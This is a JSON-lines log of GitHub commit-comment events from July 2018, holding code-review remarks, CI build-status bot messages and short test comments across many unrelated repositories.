{"id":"8013755390","type":"CommitCommentEvent","actor":{"login":"this8is8mine8"},"repo":{"name":"creativecommons/creativecommons.org"},"payload":{"comment":{"id":29823027,"position":null,"line":null,"path":null,"commit_id":"1c3de1c80d235321736c8943ab00753f02b6bd39","created_at":"2018-07-25T02:15:32Z","updated_at":"2018-07-25T02:15:32Z","author_association":"NONE","body":"Only8Master8database. \r\n!-)"}},"created_at":"2018-07-25T02:15:32Z"}
{"id":"8013755653","type":"CommitCommentEvent","actor":{"login":"getnamo"},"repo":{"name":"getnamo/ZipUtility-ue4"},"payload":{"comment":{"id":29823028,"position":null,"line":null,"path":null,"commit_id":"5d9e30e028d80c2bb702e5611dd0bf8c3d04ab92","created_at":"2018-07-25T02:15:38Z","updated_at":"2018-07-25T02:15:38Z","author_association":"OWNER","body":"Excellent, I just merged and tested this and it appears to be working! Opened and closed https://github.com/getnamo/ZipUtility-ue4/issues/28 to track this comment and the places where the merges occurred"}},"created_at":"2018-07-25T02:15:38Z"}
{"id":"8013756098","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29823029,"position":null,"line":null,"path":null,"commit_id":"be084e58412bdf2bdbf80b9782ac4314efac7358","created_at":"2018-07-25T02:15:48Z","updated_at":"2018-07-25T02:15:48Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-25T02:15:48Z"}
{"id":"8013756283","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MEWconnect-landing-page"},"payload":{"comment":{"id":29823031,"position":null,"line":null,"path":null,"commit_id":"21c18c844e5711ed17e45e72b44482cfa33c89e0","created_at":"2018-07-25T02:15:51Z","updated_at":"2018-07-25T02:15:51Z","author_association":"NONE","body":"Copy of this build can be found at https://mewc.mewbuilds.com/build/21c18c844e5711ed17e45e72b44482cfa33c89e0/index.html"}},"created_at":"2018-07-25T02:15:51Z"}
{"id":"8013756466","type":"CommitCommentEvent","actor":{"login":"carusogabriel"},"repo":{"name":"slevomat/coding-standard"},"payload":{"comment":{"id":29823033,"position":13,"line":13,"path":"tests/Sniffs/Classes/data/traitUseDeclarationErrors.fixed.php","commit_id":"d7347f9c16a4085ee1fb2a4a6a4819e551c9dcdd","created_at":"2018-07-25T02:15:55Z","updated_at":"2018-07-25T02:15:55Z","author_association":"CONTRIBUTOR","body":"Isn't this one supposed to be fixed as\r\n\r\n```php\r\nclass Whatever\r\n{\r\n    use F;\r\n    use G {\r\n        G::doSomething as doAnything;\r\n    }\r\n}\r\n```\r\n\r\n?"}},"created_at":"2018-07-25T02:15:55Z"}
{"id":"8013756814","type":"CommitCommentEvent","actor":{"login":"kenng69"},"repo":{"name":"xNicholas/modmail"},"payload":{"comment":{"id":29823034,"position":null,"line":null,"path":null,"commit_id":"a8bed3586adbf641c678b8d90f5b8c6123ad69b0","created_at":"2018-07-25T02:16:02Z","updated_at":"2018-07-25T02:16:02Z","author_association":"NONE","body":"Don't leak it publicly on Github."}},"created_at":"2018-07-25T02:16:02Z"}
{"id":"8013757473","type":"CommitCommentEvent","actor":{"login":"this8is8mine8"},"repo":{"name":"creativecommons/creativecommons.org"},"payload":{"comment":{"id":29823035,"position":null,"line":null,"path":null,"commit_id":"cb2f40a8127572a24f77b23eb5b84544bb9cb5af","created_at":"2018-07-25T02:16:17Z","updated_at":"2018-07-25T02:16:17Z","author_association":"NONE","body":"Don't think I don't know"}},"created_at":"2018-07-25T02:16:17Z"}
{"id":"8013757951","type":"CommitCommentEvent","actor":{"login":"kshitijsharma23"},"repo":{"name":"bhansa/color-palette"},"payload":{"comment":{"id":29823036,"position":16,"line":24,"path":"src/containers/App.js","commit_id":"783b821afcf239481817a195d2c9c922e3ffea2c","created_at":"2018-07-25T02:16:27Z","updated_at":"2018-07-25T02:16:27Z","author_association":"COLLABORATOR","body":"Never mutate state directly. Always use setState method."}},"created_at":"2018-07-25T02:16:27Z"}
{"id":"8013760395","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"Rbrey/Lesson2PreWork"},"payload":{"comment":{"id":29823040,"position":8,"line":8,"path":"Lesson2PreWork/Views/MyNew1/Contact.cshtml","commit_id":"447ad26d109ab164ee7ac3d6ff692bd7f1b64bed","created_at":"2018-07-25T02:17:20Z","updated_at":"2018-07-25T02:17:20Z","author_association":"NONE","body":"This ain't PHP! Do some action controller stuff!\r\n"}},"created_at":"2018-07-25T02:17:20Z"}
{"id":"8013760666","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29823041,"position":null,"line":null,"path":null,"commit_id":"27c02bc659f002ef986f3e16a4755166c3fc3c20","created_at":"2018-07-25T02:17:26Z","updated_at":"2018-07-25T02:17:26Z","author_association":"NONE","body":"develop (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2320 of 2320 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T02:17:26Z"}
{"id":"8013762001","type":"CommitCommentEvent","actor":{"login":"AerialKnee"},"repo":{"name":"AerialKnee/Vermouth"},"payload":{"comment":{"id":29823048,"position":null,"line":null,"path":null,"commit_id":"0dc94b1efb1c332bfe137d85565fcdd9c8407531","created_at":"2018-07-25T02:17:58Z","updated_at":"2018-07-25T02:17:58Z","author_association":"OWNER","body":"My first test!\r\n"}},"created_at":"2018-07-25T02:17:58Z"}
{"id":"8013762467","type":"CommitCommentEvent","actor":{"login":"superigno"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29823049,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T02:18:08Z","updated_at":"2018-07-25T02:18:08Z","author_association":"NONE","body":"Great project"}},"created_at":"2018-07-25T02:18:08Z"}
{"id":"8013762819","type":"CommitCommentEvent","actor":{"login":"adam-h"},"repo":{"name":"robotrovsky/Linux-Magic-Trackpad-2-Driver"},"payload":{"comment":{"id":29823051,"position":null,"line":null,"path":null,"commit_id":"ecfde9fce81f189a25da5a3f62db68d8272d37fb","created_at":"2018-07-25T02:18:15Z","updated_at":"2018-07-25T02:18:15Z","author_association":"CONTRIBUTOR","body":"For kernel 4.17 support this commit needs to be reverted. Just an FYI for others who may want to run this on 4.17 as I am"}},"created_at":"2018-07-25T02:18:15Z"}
{"id":"8013764384","type":"CommitCommentEvent","actor":{"login":"this8is8mine8"},"repo":{"name":"creativecommons/creativecommons.org"},"payload":{"comment":{"id":29823059,"position":null,"line":null,"path":null,"commit_id":"404ac9fac8e8f057dc613f7374fc438dcf283dc6","created_at":"2018-07-25T02:18:51Z","updated_at":"2018-07-25T02:18:51Z","author_association":"NONE","body":"Good"}},"created_at":"2018-07-25T02:18:51Z"}
{"id":"8013768707","type":"CommitCommentEvent","actor":{"login":"this8is8mine8"},"repo":{"name":"creativecommons/creativecommons.org"},"payload":{"comment":{"id":29823070,"position":null,"line":null,"path":null,"commit_id":"92b301b034fcb704925c992c9821863dd91f2e2f","created_at":"2018-07-25T02:20:27Z","updated_at":"2018-07-25T02:20:27Z","author_association":"NONE","body":"Only Master"}},"created_at":"2018-07-25T02:20:27Z"}
{"id":"8013769468","type":"CommitCommentEvent","actor":{"login":"this8is8mine8"},"repo":{"name":"creativecommons/creativecommons.org"},"payload":{"comment":{"id":29823071,"position":null,"line":null,"path":null,"commit_id":"92b301b034fcb704925c992c9821863dd91f2e2f","created_at":"2018-07-25T02:20:44Z","updated_at":"2018-07-25T02:20:44Z","author_association":"NONE","body":"Only Master data"}},"created_at":"2018-07-25T02:20:44Z"}
{"id":"8013771488","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29823074,"position":1,"line":null,"path":"1532485287.34/github_test.txt","commit_id":"f69a59e0e67dfaafa8697b6db5caae32d9f5873d","created_at":"2018-07-25T02:21:28Z","updated_at":"2018-07-25T02:21:28Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-25T02:21:28Z"}
{"id":"8013773163","type":"CommitCommentEvent","actor":{"login":"jhchon"},"repo":{"name":"SchoolGame/Cogi_Lion"},"payload":{"comment":{"id":29823075,"position":3,"line":3,"path":"README.md","commit_id":"390fada1964d637a178504ab114d0e3256fbed7f","created_at":"2018-07-25T02:22:08Z","updated_at":"2018-07-25T02:22:08Z","author_association":"CONTRIBUTOR","body":"test\r\n"}},"created_at":"2018-07-25T02:22:08Z"}
{"id":"8013774960","type":"CommitCommentEvent","actor":{"login":"rowanhogan"},"repo":{"name":"everydayhero/children-in-need-ramble"},"payload":{"comment":{"id":29823080,"position":null,"line":null,"path":null,"commit_id":"8d8bee5fc370058e383ad7fb2f7d43e568c18edc","created_at":"2018-07-25T02:22:49Z","updated_at":"2018-07-25T02:22:49Z","author_association":"CONTRIBUTOR","body":"<img width=\"497\" alt=\"screen shot 2018-07-25 at 12 19 31 pm\" src=\"https://user-images.githubusercontent.com/729085/43176049-6db09752-9005-11e8-93ae-22d32b538fc6.png\">\r\n"}},"created_at":"2018-07-25T02:22:49Z"}
{"id":"8013778696","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"Briexmac/netcore-workbook"},"payload":{"comment":{"id":29823090,"position":3,"line":3,"path":"Index.cshtml","commit_id":"6422e0797b16c862ffc8c5dc1c21b133e1a77bf5","created_at":"2018-07-25T02:24:10Z","updated_at":"2018-07-25T02:24:10Z","author_association":"NONE","body":"For brownie points, what is the name of the controller and method you would need to create so this form could be posted to your web server? [BTW, good job](https://www.youtube.com/watch?v=1UXwqNW1Bj0&feature=youtu.be&t=20s)"}},"created_at":"2018-07-25T02:24:10Z"}
{"id":"8013794756","type":"CommitCommentEvent","actor":{"login":"JaoTheFreak"},"repo":{"name":"JaoTheFreak/Projeto-Votos-Faculdade-Bagozzi"},"payload":{"comment":{"id":29823159,"position":null,"line":null,"path":null,"commit_id":"00c60fec949f46ecd5bb7005e1c8039404e9f7d3","created_at":"2018-07-25T02:30:01Z","updated_at":"2018-07-25T02:30:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar autenticação na Api](https://trello.com/c/hAXYMtEP/4-criar-autentica%C3%A7%C3%A3o-na-api)"}},"created_at":"2018-07-25T02:30:01Z"}
{"id":"8013796960","type":"CommitCommentEvent","actor":{"login":"hacktastic"},"repo":{"name":"kubernetes-incubator/external-dns"},"payload":{"comment":{"id":29823164,"position":40,"line":372,"path":"provider/designate.go","commit_id":"e499a737cbd71e4ab535670a7dfd8f1517bc250a","created_at":"2018-07-25T02:30:47Z","updated_at":"2018-07-25T02:30:47Z","author_association":"NONE","body":"Why does this invert the value of the bool \"delete\"? "}},"created_at":"2018-07-25T02:30:47Z"}
{"id":"8013797491","type":"CommitCommentEvent","actor":{"login":"SongSing"},"repo":{"name":"TheRebelG0d/avatarcropper"},"payload":{"comment":{"id":29823165,"position":null,"line":null,"path":null,"commit_id":"73aad3acab3c43d88f72827582582b51e916ec30","created_at":"2018-07-25T02:30:59Z","updated_at":"2018-07-25T02:30:59Z","author_association":"NONE","body":"this is cool why u not merge request !!"}},"created_at":"2018-07-25T02:30:59Z"}
{"id":"8013798716","type":"CommitCommentEvent","actor":{"login":"jperelli"},"repo":{"name":"cualbondi/poller"},"payload":{"comment":{"id":29823169,"position":null,"line":null,"path":null,"commit_id":"3c9ba4bb58ddfe155ef8cf808c9cf763b4a4b67a","created_at":"2018-07-25T02:31:24Z","updated_at":"2018-07-25T02:31:24Z","author_association":"MEMBER","body":":+1:"}},"created_at":"2018-07-25T02:31:24Z"}
{"id":"8013799502","type":"CommitCommentEvent","actor":{"login":"JaoTheFreak"},"repo":{"name":"JaoTheFreak/Projeto-Votos-Faculdade-Bagozzi"},"payload":{"comment":{"id":29823174,"position":null,"line":null,"path":null,"commit_id":"00c60fec949f46ecd5bb7005e1c8039404e9f7d3","created_at":"2018-07-25T02:31:42Z","updated_at":"2018-07-25T02:31:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar código de infraestrutura na Api](https://trello.com/c/HGac57EN/5-criar-c%C3%B3digo-de-infraestrutura-na-api)"}},"created_at":"2018-07-25T02:31:42Z"}
{"id":"8013799536","type":"CommitCommentEvent","actor":{"login":"doradomiguel35"},"repo":{"name":"doradomiguel35/Capstone_UnseeIt"},"payload":{"comment":{"id":29823175,"position":7,"line":6,"path":"content.js","commit_id":"322336fbd9427df41202cc00f24e9f2717e8e52a","created_at":"2018-07-25T02:31:42Z","updated_at":"2018-07-25T02:31:42Z","author_association":"OWNER","body":"wait for further instructions regarding the substitution method "}},"created_at":"2018-07-25T02:31:42Z"}
{"id":"8013802961","type":"CommitCommentEvent","actor":{"login":"smmaci"},"repo":{"name":"Polymer/lit-html"},"payload":{"comment":{"id":29823178,"position":367,"line":363,"path":"README.md","commit_id":"5e8befbc11b03268ea149951add580bc58824373","created_at":"2018-07-25T02:32:56Z","updated_at":"2018-07-25T02:32:56Z","author_association":"NONE","body":"Does this section exist somewhere else in the repo, or was it removed for a different reason?"}},"created_at":"2018-07-25T02:32:56Z"}
{"id":"8013805169","type":"CommitCommentEvent","actor":{"login":"kenorb"},"repo":{"name":"DeviaVir/zenbot"},"payload":{"comment":{"id":29823182,"position":null,"line":null,"path":null,"commit_id":"e28aa61e54a0464e4a1eeeedda863aa75cc9902f","created_at":"2018-07-25T02:33:44Z","updated_at":"2018-07-25T02:33:44Z","author_association":"NONE","body":"See: https://github.com/DeviaVir/zenbot/issues/1589#issuecomment-406414580"}},"created_at":"2018-07-25T02:33:44Z"}
{"id":"8013807358","type":"CommitCommentEvent","actor":{"login":"moonjenny"},"repo":{"name":"moonjenny/snt"},"payload":{"comment":{"id":29823189,"position":34,"line":951,"path":"contents/2015_t/html/mypage/savedcash.html","commit_id":"f1f34ee188f8b54e2afb569c58941ca9f3833b82","created_at":"2018-07-25T02:34:32Z","updated_at":"2018-07-25T02:34:32Z","author_association":"OWNER","body":"리스트 ul li 태그 추가"}},"created_at":"2018-07-25T02:34:32Z"}
{"id":"8013808228","type":"CommitCommentEvent","actor":{"login":"moonjenny"},"repo":{"name":"moonjenny/snt"},"payload":{"comment":{"id":29823192,"position":109,"line":1158,"path":"contents/2015_t/html/mypage/savedcash.html","commit_id":"f1f34ee188f8b54e2afb569c58941ca9f3833b82","created_at":"2018-07-25T02:34:51Z","updated_at":"2018-07-25T02:34:51Z","author_association":"OWNER","body":"리스트 ul li 태그 추가"}},"created_at":"2018-07-25T02:34:51Z"}
{"id":"8013810071","type":"CommitCommentEvent","actor":{"login":"sbm2391"},"repo":{"name":"vermontgarcia/roverMars"},"payload":{"comment":{"id":29823199,"position":null,"line":null,"path":null,"commit_id":"3d964b7c982ea93d7c1fd2ded58ba66608434971","created_at":"2018-07-25T02:35:34Z","updated_at":"2018-07-25T02:35:34Z","author_association":"NONE","body":"Bien logrado,  hace falta refactorizar pero ya lo aprenderás durante el bootcamp. me gustó que imprimieras la grid!"}},"created_at":"2018-07-25T02:35:34Z"}
{"id":"8013810634","type":"CommitCommentEvent","actor":{"login":"moonjenny"},"repo":{"name":"moonjenny/snt"},"payload":{"comment":{"id":29823201,"position":5,"line":1565,"path":"contents/2015_t/resources/js/jquery-mobile.ui.js","commit_id":"b151a5669e10be771586dfb8e5b7e81d1ed6e06e","created_at":"2018-07-25T02:35:46Z","updated_at":"2018-07-25T02:35:46Z","author_association":"OWNER","body":"적립금 관련 js 추가"}},"created_at":"2018-07-25T02:35:46Z"}
{"id":"8013812717","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29823205,"position":null,"line":null,"path":null,"commit_id":"85774f230b3d28f6b306e8e0a279a95af6cb82de","created_at":"2018-07-25T02:36:30Z","updated_at":"2018-07-25T02:36:30Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-25T02:36:30Z"}
{"id":"8013812815","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"pbslavin/FrontEndFeature"},"payload":{"comment":{"id":29823206,"position":3,"line":13,"path":"FrontEndFeature/Views/MyIndex/Index.cshtml","commit_id":"b469dbae9e29b75e6c148c4baa490ae683cf3053","created_at":"2018-07-25T02:36:32Z","updated_at":"2018-07-25T02:36:32Z","author_association":"NONE","body":"These are both great examples. Keep up the good work"}},"created_at":"2018-07-25T02:36:32Z"}
{"id":"8013813653","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"pbslavin/FrontEndFeature"},"payload":{"comment":{"id":29823209,"position":4,"line":4,"path":"FrontEndFeature/Views/_ViewImports.cshtml","commit_id":"b469dbae9e29b75e6c148c4baa490ae683cf3053","created_at":"2018-07-25T02:36:53Z","updated_at":"2018-07-25T02:36:53Z","author_association":"NONE","body":"Good catch from the reading"}},"created_at":"2018-07-25T02:36:53Z"}
{"id":"8013813856","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29823211,"position":null,"line":null,"path":null,"commit_id":"cce7a072acc62719ba2b5c3581193fd679b6bd90","created_at":"2018-07-25T02:36:57Z","updated_at":"2018-07-25T02:36:57Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-276](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-276).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-276-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T02:36:57Z"}
{"id":"8013815132","type":"CommitCommentEvent","actor":{"login":"HyperAndy"},"repo":{"name":"HyperAndy/forum-data-analysis"},"payload":{"comment":{"id":29823215,"position":null,"line":null,"path":null,"commit_id":"080575b73996e39326fe75fb6755a2cef589914d","created_at":"2018-07-25T02:37:28Z","updated_at":"2018-07-25T02:37:28Z","author_association":"OWNER","body":"nn test"}},"created_at":"2018-07-25T02:37:28Z"}
{"id":"8013816264","type":"CommitCommentEvent","actor":{"login":"nguyenmaihuong2051989"},"repo":{"name":"pythonvietnam/pythoncipher"},"payload":{"comment":{"id":29823218,"position":null,"line":null,"path":null,"commit_id":"2dbaf5dacbe968c2956fd5779b6ba9fa5d088d89","created_at":"2018-07-25T02:37:54Z","updated_at":"2018-07-25T02:37:54Z","author_association":"NONE","body":"1. tìm hiểu thuật toán des\r\n2. viết chương trình "}},"created_at":"2018-07-25T02:37:54Z"}
{"id":"8013821066","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"DylanZocchi/netcore-workbook"},"payload":{"comment":{"id":29823224,"position":8,"line":8,"path":"L2P1pre/L2P1pre/Views/CoolView/Index.cshtml","commit_id":"01b20fd556204f9bad13f90b5b000f6644781ad3","created_at":"2018-07-25T02:39:40Z","updated_at":"2018-07-25T02:39:40Z","author_association":"NONE","body":"This form block has good examples of controller and action tag helpers working together and apart. Good job"}},"created_at":"2018-07-25T02:39:40Z"}
{"id":"8013821705","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/conda-build-feedstock"},"payload":{"comment":{"id":29823226,"position":null,"line":null,"path":null,"commit_id":"3120ea40da8cc6882c7491439956b3db20369923","created_at":"2018-07-25T02:39:54Z","updated_at":"2018-07-25T02:39:54Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mingwandroid was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-25T02:39:54Z"}
{"id":"8013822309","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"DylanZocchi/netcore-workbook"},"payload":{"comment":{"id":29823228,"position":9,"line":9,"path":"L2P1pre/L2P1pre/Views/CoolView/Index.cshtml","commit_id":"01b20fd556204f9bad13f90b5b000f6644781ad3","created_at":"2018-07-25T02:40:10Z","updated_at":"2018-07-25T02:40:10Z","author_association":"NONE","body":"This form block has good examples of controller and action tag helpers working together and apart. Good job"}},"created_at":"2018-07-25T02:40:10Z"}
{"id":"8013826126","type":"CommitCommentEvent","actor":{"login":"hipstersmoothie"},"repo":{"name":"oliver-moran/jimp"},"payload":{"comment":{"id":29823232,"position":4,"line":38,"path":"tools/browser-build.js","commit_id":"4f94bc039c54972b34274e25acfe1737685e433c","created_at":"2018-07-25T02:41:29Z","updated_at":"2018-07-25T02:41:29Z","author_association":"COLLABORATOR","body":"I tried and it broke some tests in weird places. "}},"created_at":"2018-07-25T02:41:29Z"}
{"id":"8013827728","type":"CommitCommentEvent","actor":{"login":"xxholly32"},"repo":{"name":"EmptyCup20/easy-tool-front"},"payload":{"comment":{"id":29823236,"position":20,"line":18,"path":"bin/pull.js","commit_id":"24328d5b2c891f6aba57ee312a67976df00c0dc5","created_at":"2018-07-25T02:42:06Z","updated_at":"2018-07-25T02:42:06Z","author_association":"NONE","body":"建议\r\n直接取来就是变量，为什么要eval一下？"}},"created_at":"2018-07-25T02:42:06Z"}
{"id":"8013827773","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"DylanZocchi/netcore-workbook"},"payload":{"comment":{"id":29823237,"position":15,"line":15,"path":"L2P1pre/L2P1pre/Views/CoolView/Index.cshtml","commit_id":"01b20fd556204f9bad13f90b5b000f6644781ad3","created_at":"2018-07-25T02:42:06Z","updated_at":"2018-07-25T02:42:06Z","author_association":"NONE","body":"You appear to be missing the controller for this form post. Can you tell me what the name of the controller and method that would be called when you click submit?\r\n\r\nP.S. try to tell me without running the code."}},"created_at":"2018-07-25T02:42:06Z"}
{"id":"8013829926","type":"CommitCommentEvent","actor":{"login":"recklessop"},"repo":{"name":"Zerto-TA-Public/zplanner"},"payload":{"comment":{"id":29823242,"position":null,"line":null,"path":null,"commit_id":"db302ce57c493f10de5855b8880e0477a86da9d8","created_at":"2018-07-25T02:42:56Z","updated_at":"2018-07-25T02:42:56Z","author_association":"COLLABORATOR","body":"adding code to tell each child worker thread to get the datestamp from a txt file created by the parent thread"}},"created_at":"2018-07-25T02:42:56Z"}
{"id":"8013833672","type":"CommitCommentEvent","actor":{"login":"jingyimei"},"repo":{"name":"apache/madlib"},"payload":{"comment":{"id":29823247,"position":27,"line":973,"path":"src/madpack/madpack.py","commit_id":"1fe308c70d2c91fef508d29d81ed0e93da429eb6","created_at":"2018-07-25T02:44:17Z","updated_at":"2018-07-25T02:44:17Z","author_association":"CONTRIBUTOR","body":"Instead of versions do not mathch, it would be clearer if we mention schema doesn't exisits or madlib are not installed. "}},"created_at":"2018-07-25T02:44:17Z"}
{"id":"8013834939","type":"CommitCommentEvent","actor":{"login":"xxholly32"},"repo":{"name":"EmptyCup20/easy-tool-front"},"payload":{"comment":{"id":29823252,"position":15,"line":31,"path":"package.json","commit_id":"24328d5b2c891f6aba57ee312a67976df00c0dc5","created_at":"2018-07-25T02:44:43Z","updated_at":"2018-07-25T02:44:43Z","author_association":"NONE","body":"建议\r\nrequest应该都满足请求的场景，不太需要request-promise了吧"}},"created_at":"2018-07-25T02:44:43Z"}
{"id":"8013841297","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29823263,"position":null,"line":null,"path":null,"commit_id":"2f98c66831a365a632d56d04e7fa044cedef6c81","created_at":"2018-07-25T02:47:02Z","updated_at":"2018-07-25T02:47:02Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.249`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/249) :tada:"}},"created_at":"2018-07-25T02:47:02Z"}
{"id":"8013841522","type":"CommitCommentEvent","actor":{"login":"WoodNeck"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29823264,"position":5,"line":35,"path":"objects/Permanent.object.gmx","commit_id":"bee55d7c7c6721149cda6bad56d884554a99c972","created_at":"2018-07-25T02:47:08Z","updated_at":"2018-07-25T02:47:08Z","author_association":"NONE","body":"이 경우 debug는 전역 상수로 둬서 디버그 온오프를 시키는게 더 좋을듯\r\n상수에 DEBUG_MODE = 0 또는 1 이런식으로\r\n일반적으로 그렇게 하기도 하고, 이거 하나에만 하기보다는 다른 오브젝트에도 충분히 사용할 가능성이 있으니까"}},"created_at":"2018-07-25T02:47:08Z"}
{"id":"8013845403","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29823268,"position":null,"line":null,"path":null,"commit_id":"e6f5ec00c7542680c296133533e45a4d874cadbd","created_at":"2018-07-25T02:48:33Z","updated_at":"2018-07-25T02:48:33Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1031](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1031).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1031-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T02:48:33Z"}
{"id":"8013846222","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29823270,"position":null,"line":null,"path":null,"commit_id":"2f98c66831a365a632d56d04e7fa044cedef6c81","created_at":"2018-07-25T02:48:50Z","updated_at":"2018-07-25T02:48:50Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.377`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/407889366) :tada:"}},"created_at":"2018-07-25T02:48:50Z"}
{"id":"8013851929","type":"CommitCommentEvent","actor":{"login":"mengtrue"},"repo":{"name":"javiersantos/MaterialStyledDialogs"},"payload":{"comment":{"id":29823274,"position":null,"line":null,"path":null,"commit_id":"5cc2069ad59269c6c10fef6696a9cb122f13625c","created_at":"2018-07-25T02:50:56Z","updated_at":"2018-07-25T02:50:56Z","author_association":"NONE","body":"Hi, you add \r\n`R.style.MD_Dark`\r\nBut, in styles.xml, there is no this style, it will cause error."}},"created_at":"2018-07-25T02:50:56Z"}
{"id":"8013852763","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29823275,"position":null,"line":null,"path":null,"commit_id":"31089b8bc23e4bd98665e60884a4b91abde3914e","created_at":"2018-07-25T02:51:14Z","updated_at":"2018-07-25T02:51:14Z","author_association":"NONE","body":"I was just voicing my view.there is often debate about simplifications. I also explicitly said to keep testing it :) \r\n\r\n"}},"created_at":"2018-07-25T02:51:14Z"}
{"id":"8013856861","type":"CommitCommentEvent","actor":{"login":"wangkekekexili"},"repo":{"name":"YiyangZhu/2018-4-CLRS-2"},"payload":{"comment":{"id":29823283,"position":2,"line":2,"path":"Chap10.java","commit_id":"df18f6aa5f2b23c27369d4d02fca1e455e81f547","created_at":"2018-07-25T02:52:44Z","updated_at":"2018-07-25T02:52:44Z","author_association":"NONE","body":"this will always return true"}},"created_at":"2018-07-25T02:52:44Z"}
{"id":"8013857443","type":"CommitCommentEvent","actor":{"login":"WMX567"},"repo":{"name":"WMX567/Research-models-results-tools"},"payload":{"comment":{"id":29823284,"position":null,"line":null,"path":null,"commit_id":"f376afc51bd59d6fae9cad86e956fddfe7c54d1e","created_at":"2018-07-25T02:52:57Z","updated_at":"2018-07-25T02:52:57Z","author_association":"OWNER","body":"Adjusting CNN"}},"created_at":"2018-07-25T02:52:57Z"}
